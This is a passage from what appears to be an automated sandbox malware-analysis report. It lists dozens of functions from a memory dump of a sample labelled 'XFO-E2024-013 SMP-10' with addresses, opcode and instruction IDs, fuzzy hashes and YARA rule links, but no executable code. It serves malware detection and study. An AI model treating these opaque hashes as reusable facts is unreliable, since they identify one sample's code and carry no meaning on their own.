                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                              • Instruction ID: 90514c9b032e862121231136398420407e8bf33ccd72ea085c628c40dfa11c9e
                                                              • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                              • Instruction Fuzzy Hash: D901F532100B059FEF2AA6EAD844BA7B7E9FFD5254F05841DE9468B540DB70E442CBA0
                                                              Function 011D20F0 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 612dfa3a1a95ad610489ba236e8fec0187c10ff6e062085736142963e604a435
                                                              • Instruction ID: 2269f9b3d42be1ee87534e336e740da7e1c31bed807217f4e5cefebf79e68af6
                                                              • Opcode Fuzzy Hash: 612dfa3a1a95ad610489ba236e8fec0187c10ff6e062085736142963e604a435
                                                              • Instruction Fuzzy Hash: 55116975A0120DABCB09EFA4C850BAEBBB5EB44254F008059EA119B290EB35AE11CB90
                                                              Function 011CE5CF Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2af7b7536e3ab5c301a97921198544c70e54d2810752ca472d9b176286877f31
                                                              • Instruction ID: 64bda91df92c684aa6464e7e8d8b376c6f103c11f4edf97c3b8db11214b113be
                                                              • Opcode Fuzzy Hash: 2af7b7536e3ab5c301a97921198544c70e54d2810752ca472d9b176286877f31
                                                              • Instruction Fuzzy Hash: 7D01F7B1211A02BFD319BB39CD80F53BFACFF54658B000629B20983991DB34EC01C6E0
                                                              Function 012269C0 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 289f0cb53299c8f31fc04e6a31cdb185a16c0951f2f4caf6f999a4c677abcdfd
                                                              • Instruction ID: e4fa4e6e8a3fb6b78ebdbfa4a4eaa78effae28b520a5c866e0b841fdb2380db1
                                                              • Opcode Fuzzy Hash: 289f0cb53299c8f31fc04e6a31cdb185a16c0951f2f4caf6f999a4c677abcdfd
                                                              • Instruction Fuzzy Hash: 7001FC33234216EBC324DF69D849A6FFBA8FF54664F614129ED69871D0E7309901C7D1
                                                              Function 0121C460 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e4c832dd2fd21697b643a3775134343e266f2a96f4ba083e051a61a67933c8b7
                                                              • Instruction ID: d806a730a21c2c1cef1dc4ebc246464a5272d87ff4a0c38ba65fddbfd34b6e33
                                                              • Opcode Fuzzy Hash: e4c832dd2fd21697b643a3775134343e266f2a96f4ba083e051a61a67933c8b7
                                                              • Instruction Fuzzy Hash: 6C118B78A50209EBCB14EFA8C844EAE7BB5EB68214F004059B90197344DB35EA21CB90
                                                              Function 0121C97C Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d232d2fc37dfdeabe25edd78f6b5d8b7f6a149334a23d89be243ac1aadebcada
                                                              • Instruction ID: 2155453bd3effc070f9cbd65dc3036fa7c1973ce98744937639e88840587d4ec
                                                              • Opcode Fuzzy Hash: d232d2fc37dfdeabe25edd78f6b5d8b7f6a149334a23d89be243ac1aadebcada
                                                              • Instruction Fuzzy Hash: 841179B16183099FC704DF69D442A5BBBE4EF98310F00851EBA98D7390E630E900CB92
                                                              Function 0121CA11 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 373d0d49cc891040e656f3ff03e13c5af6d6bf25ccad8460d824afb8a2d018f0
                                                              • Instruction ID: e75bcfc693e6df35f9f0e2025eddbce0a256be2d1a7f105e32848d0ff62e4a2f
                                                              • Opcode Fuzzy Hash: 373d0d49cc891040e656f3ff03e13c5af6d6bf25ccad8460d824afb8a2d018f0
                                                              • Instruction Fuzzy Hash: 4F1179B66183099FC704DF69D441A4BBBE4FF99350F00852EBA58D73A4E630E900CB92
                                                              Function 01264A80 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                              • Instruction ID: 4fa2c2dd9073807e55cc46ce935a9f424d73698546c97afa54261da302a16161
                                                              • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                              • Instruction Fuzzy Hash: 4501D833220642EFD725AA59D854F9ABBEEFBC5210F044519E7828B6D0DAB0FC80C794
                                                              Function 011AE016 Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                              • Instruction ID: 8e8c673daaac55c2d41d21f755c101c0c127591aec9592975d554ea020a4f84d
                                                              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                              • Instruction Fuzzy Hash: 33017C36345984DFE32A866DCA48F2ABFD8EB44754F4904A1F905CB692D778DC40C662
                                                              Function 0118826B Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dd66ce7a4dd01b65beae2d4d4394b06e2da513ccceaaf8c1b29b7885c15a1d37
                                                              • Instruction ID: fc76f1a8c8641b6fbba8c864ea255e0e54807029c1f10db31c46ef9883cc09be
                                                              • Opcode Fuzzy Hash: dd66ce7a4dd01b65beae2d4d4394b06e2da513ccceaaf8c1b29b7885c15a1d37
                                                              • Instruction Fuzzy Hash: B701A732711A09DBDB1CFB69ED049BEB7FAFF50610B558029DA01A7648DF30DD01CA91
                                                              Function 0123EB50 Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: afaf54f5b0ba1f9009f62506abb3aa9596e524fca33f14f550de1975ea54c3be
                                                              • Instruction ID: a07abaccf3689b734d53c45e2322b0cbe6a7ba8462303eeb7925a715bfb6b5ad
                                                              • Opcode Fuzzy Hash: afaf54f5b0ba1f9009f62506abb3aa9596e524fca33f14f550de1975ea54c3be
                                                              • Instruction Fuzzy Hash: FD018FB1291702AFD33AAB19D841F06BAA9AF95F54F11442AE3069B790E7B0D8418B54
                                                              Function 01192582 Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1147ccdfbd6158d04585f661add9a3e04779d67173cb63e0ed932592b651fe11
                                                              • Instruction ID: 40ef3d8f7d413e980e89682f1695387a5177a66f141e838cfcfd9b74599a553d
                                                              • Opcode Fuzzy Hash: 1147ccdfbd6158d04585f661add9a3e04779d67173cb63e0ed932592b651fe11
                                                              • Instruction Fuzzy Hash: E6F0F932B41A11B7DB39DF568C40F47BEEAEB84A90F014029B61597600C730DD01C6A0
                                                              Function 011BC073 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                              • Instruction ID: 93c7e4924d99fe45e1f61ded2702c3f16cf0bfc6a43b48bd46803bbf70563268
                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                              • Instruction Fuzzy Hash: 18F0C2B6600615ABD328CF4DDC80F57FBEEDBD1A84F048128E605C7220EA31DD04CB90
                                                              Function 0118C310 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                              • Instruction ID: 0de69c4aa51d4223cf4acb8246b39c3cd42a40d0a0e6bc9e4632cbac5b968632
                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                              • Instruction Fuzzy Hash: 05F0FC73208A33ABD73E36595840BABF9958FF1A64F1A8035F6059B244CB608D039EF1
                                                              Function 011CCA6F Relevance: .0, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                              • Instruction ID: 0ebc9378c0d98f968cd7ec0d93e15d26a7a26e6d75b307133233178e4da30fab
                                                              • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                              • Instruction Fuzzy Hash: 6301F935610685EBD32B975DC809F9ABFD8FF61B54F0A4169FB488B692E774CC00C291
                                                              Function 012661E5 Relevance: .0, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8f21604e19e4758f11d6d52523da747acb0a607ca5e76d8ebf47a9c51a1c9c20
                                                              • Instruction ID: ecdfdbe7b72618c6265855afb2f1f790ee29dcccefa421a8cdc6550cf1ff15c0
                                                              • Opcode Fuzzy Hash: 8f21604e19e4758f11d6d52523da747acb0a607ca5e76d8ebf47a9c51a1c9c20
                                                              • Instruction Fuzzy Hash: 12018F71A10249DBCB04DFA9D445AEEBBF8BF58314F14405AE500B7280D774EA01CB94
                                                              Function 012163C0 Relevance: .0, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                              • Instruction ID: d0d6fa006abde17590b98220dd3f574d3b898e78ca214e0e94edfb46bdc37cec
                                                              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                              • Instruction Fuzzy Hash: BCF0F97221001DBFEF019F94DD80DAF7BBEFB69298B104125FA11A2160D671DD21EBA0
                                                              Function 0121A4B0 Relevance: .0, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 00fc8b88b4347e7efaa3055ce21713ceae5fd94ec37c8fbcabd3e2cd56e72716
                                                              • Instruction ID: 3504bba153a068a458c6c2ca74c7940b95fb036bf18e9f3af17df3242cf084a6
                                                              • Opcode Fuzzy Hash: 00fc8b88b4347e7efaa3055ce21713ceae5fd94ec37c8fbcabd3e2cd56e72716
                                                              • Instruction Fuzzy Hash: 5C018936515149EBCF129E84E844EDE7FA6FB5C754F058101FE1966224C336D970EB81
                                                              Function 0118C0F0 Relevance: .0, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3bce9fd22a53a9827492de2f091479b5311f4a2bf8d0b8dddab54611332b13e6
                                                              • Instruction ID: f768485ee6965f30e92d2e5ea4a9942ad16ebfe9252e288ff4abbfc5533ab999
                                                              • Opcode Fuzzy Hash: 3bce9fd22a53a9827492de2f091479b5311f4a2bf8d0b8dddab54611332b13e6
                                                              • Instruction Fuzzy Hash: 94F02471204241DBF71CB6299D81BA2329AE7D0754F25C06AEB058B2C1EB71DC018BF5
                                                              Function 011C656A Relevance: .0, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 91820dff1f74d59ba2d8be68e3696aac36b8f8a8b3c8b54345a10d11fb17cabf
                                                              • Instruction ID: 15c1317df42f5071d4d1cc7cbe940dfd495f65bdeff95245c47d025a47a00ddc
                                                              • Opcode Fuzzy Hash: 91820dff1f74d59ba2d8be68e3696aac36b8f8a8b3c8b54345a10d11fb17cabf
                                                              • Instruction Fuzzy Hash: 6401A4702516C2DFE32BAB6CCD48B297BE4BB64F48F694294BB118B6DAD768D401C211
                                                              Function 0123437C Relevance: .0, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                              • Instruction ID: fce89dcc0db45ebea7c44abdf61fa87ac2a54476c5b1520730390427e8e09cd9
                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                              • Instruction Fuzzy Hash: 09F02E75365D9347E779BB2E8410B2EBA569FD0D40B25056D9701CB640DF60DC40C780
                                                              Function 0121E872 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                              • Instruction ID: 8eaf7bbc08d35b4897340bd53cc1d231d659e304e83623fad101cbfcc85372b1
                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                              • Instruction Fuzzy Hash: 52F03032A315129BD322DA4DDC80F16B7A9ABE5A60F5B0065AE149B278C7A0EC428790
                                                              Function 0121C89D Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b698689775d2d27eea0a6e32b0f01fd8d2d5cb55536ba348042a7480f06fa377
                                                              • Instruction ID: a0bbf8108ebe17b32d29472a54302a66788806c9660b242641a7fc2f7f22543c
                                                              • Opcode Fuzzy Hash: b698689775d2d27eea0a6e32b0f01fd8d2d5cb55536ba348042a7480f06fa377
                                                              • Instruction Fuzzy Hash: 1EF0AFB06253049FC314EF68C446A1EBBE4FF98714F80465ABC98DB394E634EA00C796
                                                              Function 011C0854 Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                              • Instruction ID: 5f33e835cfc48987f9286d5e6a1711d659b2adefc70af4e7b8df8d5888ef9af8
                                                              • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                              • Instruction Fuzzy Hash: B3F0F072A00204EEE318DB25CC01F96B6E9EFAC704F14C068A544C7164EBB0DD40C754
                                                              Function 01218D20 Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aa7d41652efcbeee86404c6d04011b5f5d2c675b3e225fca3544d37b2f35743b
                                                              • Instruction ID: 1793eee3b4ab7278e24100fe961c592c6f3b1f231b943965ffc3fccb01c07bec
                                                              • Opcode Fuzzy Hash: aa7d41652efcbeee86404c6d04011b5f5d2c675b3e225fca3544d37b2f35743b
                                                              • Instruction Fuzzy Hash: 48F0BB325213456BDB25BA2CE888B5ABB9DFBE4724F494415FA55271698B306C80C780
                                                              Function 0121C912 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 622eba04f13674baa9338849784baea4b9ed20d54dcd5f590bf5811080151ffb
                                                              • Instruction ID: 905eba69b1517cd83c1960361bc3b8390eaa5f753f7687e4cb343ab871796eba
                                                              • Opcode Fuzzy Hash: 622eba04f13674baa9338849784baea4b9ed20d54dcd5f590bf5811080151ffb
                                                              • Instruction Fuzzy Hash: 40F0C274A11209DFCB04EFA9C515A6EB7F4FF18304F00806AB915EB385DA38EA01CB90
                                                              Function 011947FB Relevance: .0, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ef9e18242388460fce8875c6a73cb9cf95d1f160b4ca7797d95e1b449142deb3
                                                              • Instruction ID: 74934fe26e1c0c464d06d31d0cef680eff8a7021c1d50bd62af6db0c8216387c
                                                              • Opcode Fuzzy Hash: ef9e18242388460fce8875c6a73cb9cf95d1f160b4ca7797d95e1b449142deb3
                                                              • Instruction Fuzzy Hash: 46F024319122D09FEF3ACBDCC204B217BC89B00620F098C6AC5A98FD22D320D882C641
                                                              Function 01250115 Relevance: .0, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e09137dabcb5f349cd8f5c17dfb9490dce7e3155316ea7e92f8dd8a2c980b86d
                                                              • Instruction ID: 7c93ffe29972eb15fb75de5d37b0ebeddde1b3baf8f6ae3bd2915492fc89fc87
                                                              • Opcode Fuzzy Hash: e09137dabcb5f349cd8f5c17dfb9490dce7e3155316ea7e92f8dd8a2c980b86d
                                                              • Instruction Fuzzy Hash: BDF05C274377C20BCF766B3C7DD43E53F54A752210F0A5085DDA15B24AC5749483C369
                                                              Function 011CC5ED Relevance: .0, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f9ea7a8a052fa87c4d6b9b831c41969d816511dd323b847646feb0a57785244d
                                                              • Instruction ID: f99e95f825308c3d62019eca59a8c35f581e0c0ce26a84260f76c5e0447c5ce3
                                                              • Opcode Fuzzy Hash: f9ea7a8a052fa87c4d6b9b831c41969d816511dd323b847646feb0a57785244d
                                                              • Instruction Fuzzy Hash: 01F0BE725116B19BE32A966CC348B217BD89BA0EA4F099429D40A87752C360EC80CAD1
                                                              Function 011D2619 Relevance: .0, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                              • Instruction ID: 5e3d59644d68006b27c746793f5ed4b47345bee740781e268ad5515c4e2002c4
                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                              • Instruction Fuzzy Hash: 45E0D8323006012BE7259E598CC0F477B6EDFD2B14F044079BA045F251CBE2DC0982A4
                                                              Function 01226030 Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                              • Instruction ID: 2c52679f99d5d47c6df12ab4aa3c7cf7b80df43c6e9b2f0909a64f33dc6d7212
                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                              • Instruction Fuzzy Hash: A9F0A072124214AFE3218F09D840F96BBF8FB05364F41C025EB088B560D37DEC40DBA4
                                                              Function 01190710 Relevance: .0, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                              • Instruction ID: 1791573f35b1c118f6356b17058db3cbd9b7cf2edd9ea52885094b9cfb877b7b
